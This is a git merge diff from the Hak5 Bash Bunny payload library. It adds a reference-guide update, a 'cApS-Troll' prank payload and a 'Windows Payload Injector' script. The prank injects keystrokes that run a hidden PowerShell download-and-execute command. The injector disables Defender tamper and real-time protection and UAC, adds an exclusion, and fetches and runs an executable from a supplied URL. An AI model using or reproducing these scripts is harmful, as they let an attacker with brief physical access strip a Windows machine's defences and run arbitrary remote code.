Merge branch 'hak5:master' into master

docs/readme.txt

@@ -6,7 +6,7 @@
  Bash Bunny by Hak5                           USB Attack/Automation Platform
 
 
-                      -+- QUICK REFERENCE GUIDE v1.4 -+-
+                      -+- QUICK REFERENCE GUIDE v1.5 -+-
 
 
      +-----------------+
@@ -107,6 +107,8 @@
  $HOST_IP           IP Address of the Bash Bunny               
                     (Default: 172.16.64.1)                             
  $SWITCH_POSITION   "switch1", "switch2" or "switch3"
+ $BB_LABEL          Volume name of the BashBunny
+                    when mounted.
 
 
 
@@ -153,6 +155,8 @@
    GET TARGET_HOSTNAME   Returns $TARGET_HOSTNAME
    GET HOST_IP           Returns $HOST_IP
    GET SWITCH_POSITION   Returns $SWITCH_POSITION
+   GET TARGET_OS         Returns $TARGET_OS
+   GET BB_LABEL          Returns $BB_LABEL
 
 
            

payloads/extensions/get.sh

@@ -26,6 +26,10 @@ function GET() {
       [[ "${ScanForOS,,}" == *"linux"* ]] && export TARGET_OS='LINUX' && return
       export TARGET_OS='UNKNOWN'
       ;;
+      "BB_LABEL")
+      export BB_LABEL=$(ls -l /dev/disk/by-label/ | awk '/nandf$/ { print $9 }')
+      ;;
+
   esac
 }
 

payloads/library/prank/cApS-Troll/README.md

@@ -0,0 +1,105 @@
+<h1 align="center">
+  <a href="https://git.io/typing-svg">
+    <img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+;cApS+Troll+😈&center=true&size=30">
+  </a>
+</h1>
+
+<!-- TABLE OF CONTENTS -->
+<details>
+  <summary>Table of Contents</summary>
+  <ol>
+    <li><a href="#Description">Description</a></li>
+    <li><a href="#getting-started">Getting Started</a></li>
+    <li><a href="#Contributing">Contributing</a></li>
+    <li><a href="#Version-History">Version History</a></li>
+    <li><a href="#Contact">Contact</a></li>
+    <li><a href="#Acknowledgments">Acknowledgments</a></li>
+  </ol>
+</details>
+
+# cApS-Troll
+
+This payload is meant to prank your victim with TURNING on AND off CAPS LOCK
+
+## Description
+
+This payload is meant to prank your victim with TURNING on AND off CAPS LOCK
+
+## Getting Started
+
+### Dependencies
+
+* Dropbox or other file sharing service
+* Windows 10,11
+
+<p align="right">(<a href="#top">back to top</a>)</p>
+
+### Executing program
+
+* Plug in your device
+* Device will download the file and place them in proper directories to then run the script
+```
+powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
+```
+
+<p align="right">(<a href="#top">back to top</a>)</p>
+
+## Contributing
+
+All contributors names will be listed here:
+
+[atomiczsec](https://github.com/atomiczsec) &
+[I-Am-Jakoby](https://github.com/I-Am-Jakoby)
+
+<p align="right">(<a href="#top">back to top</a>)</p>
+
+## Version History
+
+* 0.1
+    * Initial Release
+
+<p align="right">(<a href="#top">back to top</a>)</p>
+
+<!-- CONTACT -->
+## Contact
+
+<h2 align="center">📱 My Socials 📱</h2>
+<div align=center>
+<table>
+  <tr>
+    <td align="center" width="96">
+      <a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
+        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
+      </a>
+      <br>YouTube
+    </td>
+    <td align="center" width="96">
+      <a href="https://twitter.com/atomiczsec">
+        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
+      </a>
+      <br>Twitter
+    </td>
+    <td align="center" width="96">
+      <a href="https://discord.gg/MYYER2ZcJF">
+        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
+      </a>
+      <br>I-Am-Jakoby's Discord
+    </td>
+  </tr>
+</table>
+</div>
+
+<p align="right">(<a href="#top">back to top</a>)</p>
+
+
+
+
+<p align="right">(<a href="#top">back to top</a>)</p>
+
+<!-- ACKNOWLEDGMENTS -->
+## Acknowledgments
+
+* [Hak5](https://hak5.org/)
+* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
+
+<p align="right">(<a href="#top">back to top</a>)</p>

payloads/library/prank/cApS-Troll/a.ps1

@@ -0,0 +1,17 @@
+while (1){
+Start-Sleep -Second 45
+$wsh = New-Object -ComObject WScript.Shell
+$wsh.SendKeys('{CAPSLOCK}')
+Start-Sleep -Second 15
+$wsh = New-Object -ComObject WScript.Shell
+$wsh.SendKeys('{CAPSLOCK}')
+Start-Sleep -Second 15
+$wsh = New-Object -ComObject WScript.Shell
+$wsh.SendKeys('{CAPSLOCK}')
+Start-Sleep -Second 15
+$wsh = New-Object -ComObject WScript.Shell
+$wsh.SendKeys('{CAPSLOCK}')
+Start-Sleep -Second 15
+$wsh = New-Object -ComObject WScript.Shell
+$wsh.SendKeys('{CAPSLOCK}')
+} 

payloads/library/prank/cApS-Troll/payload.txt

@@ -0,0 +1,18 @@
+REM     Title: cApS-Troll
+
+REM     Author: atomiczsec
+
+REM     Description: This payload is meant to prank your victim with TURNING on AND off CAPS LOCK
+
+REM     Target: Windows 10
+
+"URL='http://example.com/powershell.ps1?dl=1'"
+
+QUACK DELAY 2000
+QUACK GUI r
+QUACK DELAY 500
+QUACK STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr $URL ; iex $pl
+QUACK ENTER
+
+REM     Remember to replace the link with your DropBox shared link for the intended file to download in the URL variable
+REM     Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly

payloads/library/remote_access/Windows-Payload-Injector/payload.txt

@@ -0,0 +1,85 @@
+#!/bin/bash
+#
+# Title:            Microsoft Windows Payload Injector
+#
+# Description:      
+#                   1) Disables Tamper Protection in Windows Defender.
+#                   2) Disables UAC / Turns UAC off
+#                   3) Creates Payload Directory in C:/ Drive
+#                   4) Disables Real-Time Protection in Windows Defender.
+#                   5) Adds the Payload Directory as an exclusion in Windows Defender
+#                   6) Downloads Payload from Specified URI (Enter in Variable Below)
+#                   7) Runs Payload on System
+#
+# Author:           KryptoKola
+# Version:          1.0
+# Category:         Remote Access
+# Target:           Microsoft Windows 10 & 11
+
+LED SETUP
+ATTACKMODE HID
+#Variables
+readonly PAYLOAD_DOWNLOAD_URI="ENTER PAYLOAD URI HERE"
+
+#Disables Tamper Protection in Windows 10 & 11
+LED STAGE1
+Q GUI s
+Q STRING "Virus & threat protection"
+Q ENTER
+Q DELAY 10000
+Q TAB
+Q TAB
+Q TAB
+Q TAB
+Q ENTER
+Q DELAY 1000
+Q TAB
+Q TAB
+Q TAB
+Q TAB
+Q SPACE
+Q DELAY 1000
+Q ALT y
+Q DELAY 1000
+Q ALT F4
+Q FN ALT F4
+
+#Starts Powershell in Admin mode
+LED STAGE2
+Q GUI r
+Q DELAY 250
+Q STRING powershell Start-Process powershell -Verb runAs
+Q ENTER
+Q DELAY 3000
+Q ALT y
+Q DELAY 5000
+
+#Disables UAC, Creates Payload Directory, and moves to C:/ directory in powershell
+LED STAGE3
+Q STRING "cd C:/;mkdir Payloads;Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0;"
+Q ENTER
+Q DELAY 1500
+Q ALT y
+Q DELAY 250
+
+#Disables Real Time Protection, Makes an exclusion to the Payloads folder in Windows Defender, Navigates to the Payloads folder, then Downloads specified payload from URI.
+LED STAGE4
+Q STRING "Set-MpPreference -DisableRealtimeMonitoring 1;Set-MpPreference -ExclusionPath "C:/Payloads";cd C:/Payloads;Start-BitsTransfer -Source ${PAYLOAD_DOWNLOAD_URI} -Destination ./payload.exe;"
+Q ENTER
+Q DELAY 2000
+
+#Launches the Payload on the machine
+LED STAGE5
+Q STRING ./payload.exe
+Q ENTER
+Q DELAY 250
+
+#Clears the shell and exits out.
+LED CLEANUP
+Q STRING clear
+Q ENTER
+Q DELAY 250
+Q STRING exit
+Q ENTER
+
+LED FINISH